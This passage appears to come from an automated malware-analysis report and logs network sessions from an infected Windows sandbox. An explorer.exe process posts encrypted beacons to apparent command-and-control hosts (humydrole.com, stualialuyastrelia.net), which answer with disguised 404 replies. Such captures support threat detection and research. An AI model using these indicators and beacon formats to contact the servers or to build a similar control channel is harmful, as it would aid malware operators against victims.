                                                                                                                                                                                                                                                                                                                22192.168.2.649757186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.082417965 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qiachnslixnlv.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 116
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:53.082622051 CET170OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 53 3d ba bc
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuS=qTv}iYu1I9NEh
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.330399036 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:53 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                23192.168.2.649758186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606475115 CET341OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://asenutbisbhwhdug.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:54.606498957 CET182OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 2a 43 fb 9b
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu*Cw?xTb8Kr7pC^Iy
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.528109074 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:55 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                24192.168.2.649760186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.805500984 CET337OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://wmutobwmvhvt.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 174
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:55.805540085 CET228OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 38 2e d9 8a
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu8.a5}drh|zId'e9J^|REI2@R#4DTHxmeU.dz
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:56.731765032 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:56 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                25192.168.2.649761186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041739941 CET339OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://fsodmukeefijdn.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 366
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.041795969 CET420OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 25 46 d7 bc
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu%FOXQc^_/wmCl]9`Z~J\Kf 3KNf6Y!1>SFBWt`|Dk@ey\P
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:57.975321054 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:57 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                26192.168.2.64976291.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:09.513133049 CET337OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://afpgbknmnoeicfre.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:09.513207912 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:09.749850035 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:09 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                27192.168.2.64976391.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:10.119930029 CET333OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ooiokyouxnkw.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:10.119961023 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:10.365271091 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:10 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                28192.168.2.64976491.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:10.900283098 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qokjbpgcgvyfvg.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:10.900341034 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:11.138187885 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:11 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                29192.168.2.64976591.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:11.508126020 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://tpdebtibkom.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:11.508219004 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:11.750854969 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:11 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                30192.168.2.64976691.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:12.141952038 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://wtwybnhquvbcs.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:12.142011881 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:12.378366947 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:12 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                31192.168.2.64976791.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.052736044 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ouftarcvyeqhg.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.052782059 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:13.301497936 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:13 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
